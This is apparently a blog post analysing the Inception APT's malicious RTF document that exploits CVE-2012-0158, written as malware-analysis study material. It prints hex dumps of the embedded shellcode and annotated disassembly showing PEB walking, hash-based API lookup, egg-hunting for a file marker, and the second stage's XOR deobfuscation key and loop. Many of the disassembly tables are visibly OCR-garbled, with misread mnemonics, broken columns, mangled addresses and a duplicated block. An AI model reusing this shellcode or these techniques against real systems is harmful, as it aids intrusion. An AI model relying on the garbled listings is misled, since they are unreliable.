# Reversing the Inception APT malware

After reading the Inception paper by Snorre Fagerland and Waylon Grange, I got curious about this threat and did some reversing. I felt that it would be good to write a technical blog about the process - maybe it could be helpful or interesting for some.

### **RTF file Analysis**

#### MD5: 4a4874fa5217a8523bf4d1954efb26ef

#### Exploit: CVE-2012-0158

As we can see in following screen shot, this is a RTF [Rich Text Format] file. Its common that attackers use document files such as these as bait.

| 000000000: | <b>7</b> B | 5C | -72 | -74 | 66 | 31 | 7B | 5C | 6F | 62 | 6A | 65 6 | 3 .  | 74 | 5C | 6F | <pre>{\rtf1{\object\o</pre> |
|------------|------------|----|-----|-----|----|----|----|----|----|----|----|------|------|----|----|----|-----------------------------|
| 00000010:  | 62         | 6A | 6F  | 63  | 78 | 7B | 5C | 2A | 5C | 6F | 62 | 6A 6 | 4 (  | 61 | 74 | 61 | bjocx{\*\objdata            |
| 00000020:  | ØD         | 30 | 31  | 30  | 35 | 30 | 30 | 30 | 30 | ØD | 30 | 32 3 | 0    | 30 | 30 | 30 | F01050000F020000            |
| 00000030:  | 30         | 30 | ØD  | 31  | 36 | 30 | 30 | 30 | 30 | 30 | 30 | ØD 3 | 16 ( | 66 | 37 | 34 | 00F16000000F6f74            |
| 00000040:  | 36         | 62 | 36  | 63  | 36 | 66 | 36 | 31 | 36 | 34 | 37 | 32 3 | 2 (  | 65 | 35 | 37 | 6b6c6f6164722e57            |
| 00000050:  | 35         | 32 | 34  | 31  | 37 | 33 | 37 | 33 | 36 | 35 | 36 | 64 3 | 6 :  | 32 | 36 | 63 | 52417373656d626c            |
| 00000060:  | 37         | 39 | 32  | 65  | 33 | 31 | 30 | 30 | ØD | 30 | 30 | 30 3 | 0    | 30 | 30 | 30 | 792e3100,0000000            |
| 00000070:  | 30         | ØD | 30  | 30  | 30 | 30 | 30 | 30 | 30 | 30 | ØD | 30 3 | 1    | 30 | 30 | 30 | 0.F00000000.F01000          |
| 00000080:  | 30         | 30 | 30  | ЙD  | 34 | 31 | ЙD | 30 | 31 | 30 | 35 | 30 3 | Ю    | 30 | 30 | ЙD | 000 F41 F01 050000 F        |
| 000000000  | 30         | 20 | 20  | 30  | 20 | 30 | 20 | 30 | an | 20 | 20 | Sela | 7    | 64 | 65 | 66 | 00000000 FYSSadef           |

It is common that shellcode starts with a NOPsled. In following screenshot we can see that the embedded shellcode starts with NOP slide. NOP, or No OPeration - is a single-byte opcode that does nothing. It has the hex value of 0x90.

| 00004B30: | 39   | 30 | 39 | 30 | 39 | 30 | 39 | 30 | 39 | 30 | 39 | 30 | 39 | 30 | 39 | 30 | 909090909090909090 |
|-----------|------|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|--------------------|
| 00004B40: | 39   | 30 | 39 | 30 | 39 | 30 | 38 | 31 | 65 | 63 | 30 | 30 | 31 | 30 | 30 | 30 | 90909081ec001000   |
| 00004B50: | - 30 | 30 | 38 | 62 | 65 | 63 | 33 | 33 | 63 | 39 | 36 | 34 | 38 | 62 | 33 | 35 | 008bec33c9648b35   |
| 00004B60: | 33   | 30 | 30 | 30 | 30 | 30 | 30 | 30 | 38 | 62 | 37 | 36 | 30 | 63 | 38 | 62 | 300000008b760c8b   |
| 00004B70: | 37   | 36 | 31 | 63 | 38 | 62 | 35 | 65 | 30 | 38 | 38 | 62 | 34 | 36 | 30 | 38 | 761c8b5e088b4608   |
| 00004B80: | 38   | 62 | 37 | 65 | 32 | 30 | 38 | 62 | 33 | 36 | 36 | 36 | 33 | 39 | 34 | 66 | 8b7e208b3666394f   |
| 00004B90: | 31   | 38 | 37 | 35 | 66 | 32 | 38 | 39 | 35 | 64 | 30 | 34 | 38 | 39 | 34 | 35 | 1875f2895d048945   |
| 00004BA0: | - 30 | 38 | 66 | 66 | 37 | 35 | 30 | 38 | 36 | 38 | 61 | 64 | 39 | 62 | 37 | 64 | 08ff750868ad9b7d   |
| 00004BB0: | 64   | 66 | 65 | 38 | 62 | 66 | 30 | 30 | 30 | 30 | 30 | 30 | 38 | 39 | 34 | 35 | dfe8bf0000008945   |
| 00004BC0: | 32   | 30 | 66 | 66 | 37 | 35 | 30 | 38 | 36 | 38 | 35 | 34 | 63 | 61 | 61 | 66 | 20ff75086854caaf   |
| 00004BD0: | 39   | 31 | 65 | 38 | 61 | 66 | 30 | 30 | 30 | 30 | 30 | 30 | 38 | 39 | 34 | 35 | 91e8af0000008945   |
| 00004BE0: | 32   | 34 | 66 | 66 | 37 | 35 | 30 | 38 | 36 | 38 | 61 | 63 | 30 | 38 | 64 | 61 | 24ff750868ac08da   |
| 00004BF0: | 37   | 36 | 65 | 38 | 39 | 66 | 30 | 30 | 30 | 30 | 30 | 30 | 38 | 39 | 34 | 35 | 76e89f0000008945   |
| 00004C00: | 32   | 38 | 66 | 66 | 37 | 35 | 30 | 38 | 36 | 38 | 31 | 36 | 36 | 35 | 66 | 61 | 28ff7508681665fa   |
| 00004C10: | 31   | 30 | 65 | 38 | 38 | 66 | 30 | 30 | 30 | 30 | 30 | 30 | 38 | 39 | 34 | 35 | 10e88f0000008945   |
| 00004C20: | 32   | 63 | 36 | 61 | 30 | 34 | 35 | 65 | 35 | 34 | 35 | 36 | 66 | 66 | 35 | 35 | 2c6a045e5456ff55   |
| 00004C30: | 32   | 30 | 38 | 39 | 38 | 35 | 39 | 34 | 30 | 30 | 30 | 30 | 30 | 30 | 38 | 33 | 208985940000083    |
|           |      |    |    |    |    |    |    |    |    |    |    |    |    |    |    |    |                    |

#### Embedded Shellcode Analysis - First Level

Now, to the functionality of the shellcode. We will ignore the first two prolog instructions, and for remaining statements I have inserted comments to help understanding what is happening in this chunk of

code. It's traversing the TEB, the PEB and the Ldr structure to get the base addresses of ntdll.dll and kernel32.dll. It needs these to find the API addresses it requires for the rest of the infection.

| 00120E88 | 81EC 00100000    | SUB ESP, 1000        | CS1-DEP                             | ~                                              |
|----------|------------------|----------------------|-------------------------------------|------------------------------------------------|
| 00120E8E | 8 BEC            | MOV EBP, ESP         | LJI-FLU                             |                                                |
| 00120E90 | 33C9             | XOR ECX, ECX         | CSI-DCD_slide                       |                                                |
| 00120E92 | 64:8B35 30000000 | MOU ESI, DWORD PTR 1 | FS:[30]                             |                                                |
| 00120E99 | 8B76 ØC          | MOU ESI, DWORD PTR   | DS:[ESI+C]                          | Secur32. <moduleentrypoint></moduleentrypoint> |
| 00120E9C | 8B76 1C          | MOU ESI, DWORD PTR 1 | DS = [ESI +1C] PEB->Ldr.InInitOrder |                                                |
| 00120E9F | 8B5E Ø8          | MOU EBX, DWORD PTR 1 | DS:[ESI+8]                          | 0 20 0000000                                   |
| 00120EA2 | 8B46 Ø8          | MOU EAX, DWORD PTR   | DS : [ES I +8 ] EBX = ininitUrder[  | X j.base_address 👌 👘 👘                         |
| 00120EA5 | 8B7E 20          | MOU EDI, DWORD PTR   | DS:[ESI+20]                         |                                                |
| 00120EA8 | 8B36             | MOU ESI, DWORD PTR 1 | DS:[ESI]   Loop to find Kornel 23   | 2 dll Roop address                             |
| 00120EAA | 66:394F 18       | CMP WORD PTR DS:[E]  | DI +18],CX Luup willing Reflector   | Lun Dasc duuress                               |
| 00120EAE | ^ 75 F2          | JNZ SHORT 00120EA2   |                                     |                                                |
| 00120EB0 | 895D 04          | MOU DWORD PTR SS:[]  | EBP+4], EBX                         | ntd11.7C900000                                 |
| 00120EB3 | 8945 08          | MOU DWORD PTR SS: [] | <mark>EBP +8 ] ,</mark> EAX         | kerne132.7C800000                              |

In screenshot below, Function 00120F82 is the malware's own GetProcAddress function which takes two parameters

- 1. Base address of the system dll
- 2. Hash of the API name.

The function returns the memory address of the API.

| FF75_08                   | PUSH DWORD PTR SS: [EBP+8] | l                       | kerne132.7C800000  |
|---------------------------|----------------------------|-------------------------|--------------------|
| 68 AD9B7DDF<br>F8 BF00000 | CALL 00120F82              | Hash for GetFileSize    |                    |
| 8945 20                   | MOU DWORD PTR SS: [EBP+20] | , EAX                   | kerne132.7C800000  |
| FF75 Ø8                   | PUSH DWORD PTR SS:[EBP+8]  | 1                       | kerne132.7C800000  |
| 68 54CAAF91               | PUSH 91AFCA54              | Hash for VirtualAlloc   |                    |
| E8 HF000000               | CHLL 00120F82              | EAU                     | 1                  |
| 8745 24                   | MUU DWORD FIR SS:LEBP+24.  | , EHA                   | Kerne 132.76800000 |
| FF75 Ø8                   | PUSH DWORD PIK SS:LEBP+8.  | 1                       | kerne132.70800000  |
| 68 ACØ8DA76               | PUSH [76DA08AC]            | Haah fan SatfileDaistan |                    |
| E8 9 FUUUUUU              | CALL 00120F82              | Hash int Sectionalities |                    |
| 8945 28                   | MOU DWORD PTR SS:[EBP+28]  | , EAX                   | kerne132.7C800000  |
| FF75 08                   | PUSH DWORD PTR SS:[EBP+8]  | 1                       | kerne132.7C800000  |
| 68 1665FA10               | PUSH 10FA6516              | Hash for Deadlile       |                    |
| E8 8F00000                | CALL 00120F82              | riasii iur iteaurile    |                    |
| 8945 2C                   | MOU DWORD PTR SS: [EBP+2C] | .EAX                    | kerne132.7C800000  |

#### Functionality of function 00120F82 (GetProcAddress)

As shown in the next screenshot, this function parses the "export name pointer table" of the .dll [ex. kernel32.dll] and generates a hash for each function. It compares this with the argument API hash (Ex DF7D9BAD for GetFileSize, see above screenshot) using the CMP EDI, ESI instruction. Once the matching API is found it parses the Export Address Table and returns the respective API address to the caller in EAX register.

| <b>00120F82</b>                                                                                                    | 55                                                                                                    | PUSH FBP                                                                                                    |
|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|
| 00120F83                                                                                                    | 8BFC                                                                                                   | MOUL FRP FSP                                                                                                    |
| 00120F85                                                                                                    | 57                                                                                                    |                                                                                                    |
| 00120105                                                                                                    | 8870 08                                                                                                | MOULEDI DUORD PTR SS-LERP+81                                                                                                    |
| 00120100                                                                                                    |                                                                                                    | MOULERY DUORD PTR 99-1ERP+01                                                                                                    |
| 00120107                                                                                                    |                                                                                                    | DIEU EET                                                                                                    |
| 00120100                                                                                                    | 00<br>0000 00                                                                                          | MOUL FOIL DUODD DTD DC+[EDV+2010.pt]                                                                                                    |
| 00120100                                                                                                    |                                                                                                    | IND CUOPT OR 2000                                                                                                    |
| 00120170                                                                                                    |                                                                                                    | NOD                                                                                                    |
| 00120172                                                                                                    | 90                                                                                                    | NOP                                                                                                    |
| 00120173                                                                                                    | 00                                                                                                    | NOP                                                                                                    |
| 00120174                                                                                                    | 00                                                                                                    | NOP                                                                                                    |
| 00120175                                                                                                    | 90                                                                                                    |                                                                                                    |
| 00120170                                                                                                    | 00                                                                                                    | NOP                                                                                                    |
| 00120177                                                                                                    | 007400 70                                                                                              | MOUL FOIL DUODD DID DO - FEDVAE014701                                                                                                    |
| 00120170                                                                                                    | 007133 70                                                                                              | ADD EGI EDV.                                                                                                    |
| 00120170                                                                                                    | 63F3<br>56                                                                                             | DUCH FOI MAGE EXPORT DIRECTORY                                                                                                    |
| 00120772                                                                                                    | 8876 20                                                                                                | MOULEST DUORD PTP DC - FEST+201                                                                                                    |
| 00120777                                                                                                    | 0222                                                                                                   | ADD EGI EDY                                                                                                    |
| 00120742                                                                                                    | 2200                                                                                                   | KOP ECY ECY EXPORT Name Pointer Table                                                                                                    |
| 00120744                                                                                                    | A0                                                                                                    | NUN EUN,EUN<br>DEC ECY                                                                                                    |
| 00120FH0                                                                                                    | 41                                                                                                    |                                                                                                    |
| 00120147                                                                                                    | 0D                                                                                                    | LODE DUORD PTP DE FEEL1                                                                                                    |
| 00120140                                                                                                    | 03C3                                                                                                   | ADD FAY FRY                                                                                                    |
| 00120FH7                                                                                                    | 56                                                                                                    | DICH ECI                                                                                                    |
| 00120FHD                                                                                                    | 3376                                                                                                   |                                                                                                    |
| 00120FAG                                                                                                    | OFRE10                                                                                                 | MONEY ENV BUTE PTR DC - FEAVI                                                                                                    |
| 00120FR1                                                                                                    | 3806                                                                                                   | CMP DH DL                                                                                                    |
| 00120FB3                                                                                                    | 74 08                                                                                                  | JE SHORT 00120ERD                                                                                                    |
| 00120FB5                                                                                                    | CICE OD                                                                                                | ROR FST OD                                                                                                    |
| 00120FB8                                                                                                    | 03F2                                                                                                   | ADD FSI FDX                                                                                                    |
| 00120FBA                                                                                                    | 40                                                                                                    | INC FAX                                                                                                    |
| 00120FBB                                                                                                    | ^ FB F1                                                                                                | IMP SHORT 00120FAF                                                                                                    |
| 00120FBD                                                                                                    | 3BFE                                                                                                   | CMP_EDL_EST                                                                                                    |
| 00120FBF                                                                                                    | 5E                                                                                                    | POP ESI                                                                                                    |
| 00120FC0                                                                                                    | ^ 75 E5                                                                                                | JNZ SHORT 00120FA7                                                                                                    |
| 00120FC2                                                                                                    | 54                                                                                                    | POP EDX                                                                                                    |
| 00120FC3                                                                                                    | 8BEB                                                                                                   | MOU EBP.EBX                                                                                                    |
| 00120FC5                                                                                                    | 8B5A 24                                                                                                | MOU EBX, DWORD PTR DS: [EDX+24] Ordinal Table RVA                                                                                                    |
| 00120FC8                                                                                                    | Ø3DD                                                                                                   | ADD EBX.EBP                                                                                                    |
| 00120FCA                                                                                                    | 66:8BØC4B                                                                                              | MOU CX.WORD PTR DS:[EBX+ECX*2]                                                                                                    |
| 00120FCE                                                                                                    | 8B5A 1C                                                                                                | MOV EBX. DWORD PTR DS: [EDX+1C]RVA to EAT                                                                                                    |
| 00120FD1                                                                                                    | Ø3DD                                                                                                   | ADD EBX, EBP                                                                                                    |
| 00120FD3                                                                                                    | 8BØ48B                                                                                                 | MOU EAX, DWORD PTR DS: [EBX+ECX*4] nua state and                                                                                                    |
| 00120FD6                                                                                                    | 03C5                                                                                                   | ADD EAX, EBP                                                                                                    |
| 00120FD8                                                                                                    | 5E                                                                                                    | POP ESI                                                                                                    |
| 00120FD9                                                                                                    | 5F                                                                                                    | POP EDI                                                                                                    |
| 00120FDA                                                                                                    | 5D                                                                                                    | POP EBP                                                                                                    |
| 00120FDB                                                                                                    | C2 0800                                                                                                | RETN 8                                                                                                    |
| 00120FC3<br>00120FC5<br>00120FC8<br>00120FCA<br>00120FCE<br>00120FD1<br>00120FD3<br>00120FD6<br>00120FD8<br>00120FD8<br>00120FD9<br>00120FDA<br>00120FDB | 8BEB<br>8B5A 24<br>03DD<br>66:8B0C4B<br>8B5A 1C<br>03DD<br>8B048B<br>03C5<br>5E<br>5F<br>5D<br>C2 0800 | MOU EBP, EBX<br>MOU EBX, DWORD PTR DS: [EDX+24] Ordinal Table RVA<br>ADD EBX, EBP<br>MOU CX, WORD PTR DS: [EBX+ECX*2]<br>MOU EBX, DWORD PTR DS: [EDX+1C]RVA to EAT<br>ADD EBX, EBP<br>MOU EAX, DWORD PTR DS: [EBX+ECX*4]<br>ADD EAX, EBP<br>POP ESI<br>POP EDI<br>POP EBP<br>RETN 8 |

The document contains two levels of shellcode. We are analyzing first level, and in the following code we can see a typical egghunting method: It attempts to open the already opened rtf file by checking file handles in memory. It starts with a handle with the value 4 and verifies it by doing GetFileSize on it. If this fails it does ADD ESI,4 again (adds 4 to the handle) until the API succeeds. When this happens it checks the file offset 0x8300 for the marker 0x54405450. Again, if this matches up, it allocates memory into which it reads the file content and jumps to the 2<sup>nd</sup> level shellcode with a JMP EBX.

| 00120EF6             | 6A 04                   | PUSH 4                                                                                                    |                                 |
|----------------------|-------------------------|----------------------------------------------------------------------------------------------------|---------------------------------|
| 00120552             | 5 F                     | POP FOI                                                                                                    |                                 |
| OOLCOLLO<br>OOLCOLLO |                         |                                                                                                    |                                 |
| <b>UUIZUEFY</b>      | 54                      | PUSH ESP                                                                                                    |                                 |
| 00120EFA             | 56                      | PUSH ESI                                                                                                    |                                 |
| GG1 2GEED            | FFEE 20                 | COLL DUODD DTD CC-IEDD+201                                                                                                    | kewpel22 CetFileSize            |
| OOLCOLTE             |                         | HALL DWORD TIN 00-TEDI 0201                                                                                                    | Kerneijz.detriieoize            |
| <b>UUIZUEFE</b>      | 8785 74000000           | MOU DWORD PIR SS:LEBP+941,EHX                                                                                                    | kerne132.KeadFile               |
| 00120F04             | 83F8 FF                 | CMP EAX1                                                                                                    |                                 |
| 00120202             | 75 06                   | INZ SHOPT GG12GEGE                                                                                                    |                                 |
| 00120101             | 0000 04                 |                                                                                                    |                                 |
| 00120F07             | 8366 04                 | HUU ESI,4                                                                                                    |                                 |
| 00120F0C             | 56                      | PUSH ESI                                                                                                    |                                 |
| 00120F0D             | ^ FB F9                 | IMP SHORT 00120FF8                                                                                                    |                                 |
| OOL OOLOT            | 0100 00                 | CMD FAU A                                                                                                    |                                 |
| DOIZOPOP             | 8318 00                 | GRE EHA, U                                                                                                    |                                 |
| 00120F12             | ^ 76 F5                 | JBE SHORT 00120F09                                                                                                    |                                 |
| 00120F14             | 6A 00                   | PUSH 0                                                                                                    |                                 |
| 00120216             | 60 00                   | PUCH 0                                                                                                    |                                 |
| 00120110             | 01 00                   |                                                                                                    |                                 |
| 00120F18             | 68 00830000             | PUSH 8300 Marker Unset in .rt file                                                                                                    |                                 |
| 00120F1D             | 56                      | PUSH ESI                                                                                                    |                                 |
| 00120F1F             | FF55 28                 | COLL DUORD PTR SS-LERP+281                                                                                                    | kewnel32 SetFilePointew         |
| 00120111             | 0105 0000000            |                                                                                                    | Verheiter of the et.            |
| 00120721             | 8782 30000000           | LEH EHA, DWORD FIR SS: LEBF 701                                                                                                    |                                 |
| 00120F27             | 6A UU                   | PUSH Ø                                                                                                    |                                 |
| 00120F29             | 50                      | PUSH EAX                                                                                                    | kerne132.ReadFile               |
| 00120F2A             | 60.08                   | PUSH 8                                                                                                    |                                 |
| 00120120             | 0100 00000000           | LEG EGY DUODD DTD CC. LEDD.OC.                                                                                                    |                                 |
| 00120720             | 0102 10000000           | DEH EHA, DWOND FIN 33-LEDF*701                                                                                                    | 1 100 D 1D11                    |
| 00120F32             | 50                      | PUSH EHX                                                                                                    | kerne132.KeadFile               |
| 00120F33             | 56                      | PUSH ESI                                                                                                    |                                 |
| 00120F34             | FF55 2C                 | CALL DWORD PTR SS:[EBP+2C]                                                                                                    | kernel32.ReadFile               |
| 00120737             | 81 BD 90000000 50544054 | CMP DUOPD PTP SS-IEPP+9C1 54405450 r H                                                                                                    |                                 |
| 00140137             | 01DD 10000000 10144014  | The puop and solution states is the first states is the first states is the states is the states is | ker for Second level Shell code |
| 00120F41             | ° 75 Gb                 | JNZ SHORI 00120F09                                                                                                    |                                 |
| 00120F43             | 89B5 9800000            | MOU DWORD PTR SS:LEBP+981,ESI                                                                                                    |                                 |
| 00120F49             | 6A 40                   | PUSH 40                                                                                                    |                                 |
| 00120F4B             | 68 00100000             | PUCH 1000                                                                                                    |                                 |
| 00120110             | EEDE 4000000            | DUCH NUMBER DED CO. (EDD. AG1                                                                                                    |                                 |
| 00120F50             | LLR2 HOODOOOO           | PUSH DWORD PIK SS:LEBP+HØI                                                                                                    |                                 |
| 00120F56             | 6A 00                   | PUSH Ø                                                                                                    |                                 |
| 00120F58             | FF55 24                 | CALL DWORD PTR SS:[EBP+24]                                                                                                    | kerne132.VirtualAlloc           |
| 00120F5B             | 8985 0400000            | MOUL DUORD PTR SS-LEBP+041 FOX                                                                                                    | kewnel32 ReadFile               |
| 00120130             | 0703 0000000            | LEA EDU DUCDD DTD CO. (EDD. 001                                                                                                    | Kerne 152. Neaur 11e            |
| 00120F61             | 8737 30000000           | LEH EBA, DWORD PIR 55: LEBP+901                                                                                                    |                                 |
| 00120F67             | 6A UU                   | PUSH Ø                                                                                                    |                                 |
| 00120F69             | 53                      | PUSH EBX                                                                                                    | kerne132.7C802654               |
| 00120F60             | FFR5 А000000            | PUSH DUORD PTR SS:[FBP+00]                                                                                                    |                                 |
| 00120100             |                         |                                                                                                    | kauna 122 RaadRila              |
| 00120170             | 20                      | FUON CHA                                                                                                    | Kerne132.Keadrile               |
| 00120F71             | FFB5 98000000           | LORH DMOKD LLK 22: [ERL+28]                                                                                                    |                                 |
| 00120F77             | FF55 2C                 | CALL DWORD PTR SS:[EBP+2C]                                                                                                    | kerne132.ReadFile               |
| 00120F70             | 889D A400000            | MOUL FRY DUORD PTR SS: [FRP+04]                                                                                                    |                                 |
| 00120170             | EEES                    | THD EDV                                                                                                    | to second level shellcode       |
| 00120r80             | - FFEJ                  | UTIF EDA                                                                                                    | A CONTRACTOR OF CONTRACTOR      |

### Second Level Shell Code Analysis

Now we have landed into the second level shellcode, but it is obfuscated to evade static analysis. At the initial stage there are few instructions waiting to help us. This is the deobfuscation code. We can see that 0x23B \* 4 is the number of bytes obfuscated, POP EBX is the get EIP instruction and 0x5687F945 is the deobfuscation XOR key.

| Before Deobfuscation                                  | After DeObfuscation                |
|-------------------------------------------------------|------------------------------------|
| 01.7F0000 NOP                                         | NOP                                |
| 017F0001 NOP                                          | NOP                                |
| 017F0002 PREFETCH QWORD PTR DS:[EAX]                  | PREFETCH QWORD PTR DS:[EAX]        |
| 017F0005 XOR ECX, ECX                                 | XOR ECX, ECX                       |
| 017F0007 MOU ECX,23B                                  | MOU ECX, 23B                       |
| 017F000C FSTP ST                                      | FSTP ST                            |
| 017F000E NOP                                          | NOP                                |
| 017F000F FSTENU (28-BYTE) PTR SS:[ESP-C]              | FSTENU (28-BYTE) PTR SS:LESP-CJ    |
| 017F0013 POP EBX                                      | PUP EBA                            |
| 017F0014 XOR DWORD PTR DS:LEBX+141,5687F945           | AUK DWUKD FIK DS:LEBA+141,5687F945 |
| 017F001B SUB EBX, -4                                  | SUB EBA, -4                        |
| 017F001E LOOPD SHORT 017F0014                         | COLL GITEGOTO                      |
| 017F0020 LODS DWORD PIR DS:LESIJ                      | LODE DUODD DTD DC - [ECI]          |
| 017F0021 LODS DWORD PIK DS:LESIJ                      | HOLS DWOND FIN DS.LESTI            |
| 017F0022 NGHG DWOKD FIK D3:LE31+451,EDA               | ICE SHORT 017E0008                 |
| OTALOOZO LOOU COL                                     | LODS BYTE PTR DS: [ESI]            |
| 017F0020 DDD HL,2D<br>017F0020 COLL FOR F2FF-220C0FFF | OR DL_BL                           |
| 017F002F LODS BYTE PTR DS - [FSI]                     | JRE SHORT 01 2F0044                |
| 017F0030 PIISH FRP                                    | CLI                                |
| 017F0031 ADC FAX 2495510                              | ADC AH.CH                          |
| 017F0036 ADC BYTE PTR DS: [EBX+DC4DC44A1_CH           | XCHG EAX,EDI                       |
| A17FAA3C PUSH DS                                      | ADD ECX, DWORD PTR DS:[EBX+EDI*8]  |
| 017F003D ADC ECX.ESI                                  | XCHG EAX,EDI                       |
| 017F003F FSUBR QWORD PTR SS:[EBP+AC750D20]            | STD                                |
| 017F0045 POPAD                                        | RDPMC                              |
| 017F0046 JNS SHORT 017F0024                           | RETF 5B8A                          |
| 017F0048 DEC EBX                                      | JMP FAR 238A:D9E88A49              |
| 017F0049 MOU ESP, ESI                                 | JMP 1009FEE1                       |
| 017F004B MOV ECX, EFA50F73                            | JO SHORT U17FUUBE                  |
| 017F0050 CMP DWORD PTR DS:[EDI+E636B45F], EAX         | OUT DX,EAX                         |
| 017F0056 ????                                         | MOUL BYIE PIK SS:LEDX]             |
| U17FUU57 POP ESP                                      | TUD EGA, EZD87E7G                  |
| U17FUU58 LODS DWORD PTR DS:[ESI]                      | THE CHOPT OF TROOPS                |
| U17FUU59 UA SHORT U17FUU24                            | COLL EDODAEED                      |
| NT ZENNS RIPOP EAX                                    | CHLL ED8D4EEB                      |

In following code we can see the hexadecimal value that corresponds to the library name being pushed to the LoadLibrary function, as well as two loops to get the API addresses using "CALL 02E203E2" function. Here also it uses hashes to look up APIs.

| Hash     | API             | Hash     | API               |
|----------|-----------------|----------|-------------------|
| 73E2D87E | ExitProcess     | oCo397EC | GlobalAlloc       |
| 7CB922F6 | GlobalFree      | 10FA6516 | ReadFile          |
| 36EF7370 | GetCommandLineA | 76DA08AC | SetFilePointer    |
| oE8AFE98 | WinExec         | DF7D9BAD | GetFileSize       |
| E9238AD9 | _lwrite         | 6DD38706 | CoUninitialize    |
| E88A49EA | _lcreat         | EB9E05F5 | CoSetProxyBlanket |
| 5B8ACA33 | GetTempPathA    | 6E26C880 | CoCreateInstance  |
| oFFD97FB | CloseHandle     | 7FC7A3CB | CoInitializeEx    |

| OOTOOOAD                                                                                                    | 50                 | DUOU TAU                             |                         |
|----------------------------------------------------------------------------------------------------|--------------------|--------------------------------------|-------------------------|
| 02E200H7                                                                                                    | 50                 | PUSH EHX                             |                         |
| 02520068                                                                                                    | 68 65603332        | PUSH 32336C65                        |                         |
| OGEGOOAD                                                                                                    |                    |                                      |                         |
| OZEZOOHD                                                                                                    | 68 6B65726E        | PUSH 6E72656B Kernel3Z               |                         |
| 02F200B2                                                                                                    | 8BC4               | MOUL FAX FSP                         |                         |
| OOTOOD4                                                                                                    |                    |                                      |                         |
| 0ZEZ00B4                                                                                                    | 50                 | PUSH EHX                             |                         |
| 02E200B5                                                                                                    | FF57_3C            | CALL DWORD PTR DS:[EDI+3C]           | kewnell?? LoadLibwawuû  |
| 00200000                                                                                                    | 0000               | MOULEBY FOU                          | Kerne 132. DoauDibraryn |
| 02E200B8                                                                                                    | 8808               | NOV EBA, EHA                         |                         |
| <b>И2Е2ИИВА</b>                                                                                                 | 68 10              | PUSH 10                              |                         |
| 02E200DC                                                                                                    | <b>E0</b>          | POP ECY                              |                         |
| 02L200DC                                                                                                    |                    |                                      |                         |
| NSESNNRD                                                                                                    | 8B7D FC            | MOU EDI, DWORD PTR SS: LERP-41       |                         |
| <b>02E200C0</b>                                                                                                 | 51                 | PUSH FCX                             |                         |
| 00200000                                                                                                    |                    | DUGU EDU                             | 1                       |
| DZEZODCI                                                                                                    | 53                 | PUSH EBA                             | Kerne132.76800000       |
| 02E200C2                                                                                                    | FF748F FC          | PUSH DWORD PTR DS:[EDI+ECX+4-4]      |                         |
| 02E200CC                                                                                                    | E0 17020000        | COLL BOFORTO                         |                         |
| 02120000                                                                                                    | T0 11010000        |                                      |                         |
| NSESNACB                                                                                                    | 59                 | POP ECX                              |                         |
| 02F200CC                                                                                                    | 89448F FC          | MOU DUORD PTR DS:[FDI+FCX#4-41 FAX   |                         |
| 00100000                                                                                                    | * E0 EE            | LOODD OUDDT OPPOPOO                  |                         |
| OZEZOODO                                                                                                    | EZ EE              | LOOPD SHORI 02E200C0                 |                         |
| 02E200D2                                                                                                    | 33C0               | XOR EAX.EAX                          |                         |
| 02E200D4                                                                                                    | 50                 | PUSH FOY                             |                         |
| 00700005                                                                                                    |                    |                                      |                         |
| 02E200D5                                                                                                    | 68 64666600        | PUSH 6C6C64                          |                         |
| <b>И2Е2ИИДА</b>                                                                                                 | 68 6173652E        | PUSH 2E657361 combase dll            |                         |
| 00E000DE                                                                                                    | 60 636 PC DC 3     | PUCH C2CDCEC2                        |                         |
| OZEZOODE                                                                                                    | 00 03010002        | <b>FUSH 020D0F03</b>                 |                         |
| 02E200E4                                                                                                    | 8BC4               | MOU EAX, ESP                         |                         |
| <b>02F200F6</b>                                                                                                 | 50                 | PUSH FAX                             |                         |
| OOTOOOTO                                                                                                    | EECO 24            | COLL DUODD DTD DO-LEDI 241           | 1                       |
| OZEZODE7                                                                                                    | FF57 34            | GHLL_DWORD PIR DS: LEDI+341          | Kernel32.LoadLibraryH   |
| 02E200EA                                                                                                    | 83F8 00            | CMP EAX,0                            |                         |
| 02F200FD                                                                                                    | . 75 19            | IN7 SHORT 02E20101                   |                         |
| COLLOOLD                                                                                                    |                    |                                      |                         |
| OZEZODEF                                                                                                    | 6H 6C              | PUSH 6C                              |                         |
| 02E200F1                                                                                                    | 68 322E646C        | PUSH 6C642E32                        |                         |
| 02220026                                                                                                    | 69 68666522        |                                      |                         |
| 02120010                                                                                                    | 00 01000333        | 1031 33030301 01632.01               |                         |
| OZEZOOFB                                                                                                    | 8864               | HOV EHX,ESP                          |                         |
| 02E200FD                                                                                                    | 50                 | PUSH EAX                             |                         |
| 02E200PE                                                                                                    | 8857 24            | COLL DUODD DID DC - FEDI+241         | kanna 122 LaadLikusuut  |
| OZEZOUFE                                                                                                    | 1157 J4            | OTHE DWOND FIN DO-LEDITOTI           | Kerneisz. Luaulinraryh  |
| 02E20101                                                                                                    | 8808               | MOV EBX,EAX                          |                         |
| 02E20103                                                                                                    | 68 05              | PUSH 5                               |                         |
| 00100100                                                                                                    | EO                 | DOD ECH                              |                         |
| 02520102                                                                                                    | 57                 | FUF EGA                              |                         |
| 02E20106                                                                                                    | 8B7D FC            | MOU EDI, DWORD PTR SS:[EBP-4]        |                         |
| 02520100                                                                                                    | 8301 10            | ODD FCY 10                           |                         |
| 00100107                                                                                                    | 0301 10            |                                      |                         |
| 02E2010C                                                                                                    | 51                 | PUSH EGA                             |                         |
| 02E2010D                                                                                                    | 53                 | PUSH EBX                             | kerne132.7С800000       |
| 02E2040E                                                                                                    | PP349P PC          | DUCH DUODD DTD DC . [EDI +ECV+4-4]   |                         |
| OZEZOTUE                                                                                                    | FF (70F FG         | TOOH DWOND FIN DO LEDITEGN*4-41      |                         |
| 02E20112                                                                                                    | F8 CRNZNNNN        | CHLL UZEZUJEZ                        |                         |
| 02E20117                                                                                                    | 59                 | POP ECX                              |                         |
| 00200117                                                                                                    | 00440E EC          | MOU DUODD DTD DC+FEDI+ECV+4_41 FAV   |                         |
| OZEZOI18                                                                                                    |                    | THUN DWURD PIK USSIEDITELA89-91. PHX |                         |
| the second second second second second second second second second second second second second second second se | 071101 10          |                                      |                         |
| 02E2011C                                                                                                    | 83E9 10            | SUB ECX,10                           |                         |
| 02E2011C<br>02E2011E                                                                                            | 83E9 10<br>^ F2 F8 | SUB ECX,10                           |                         |

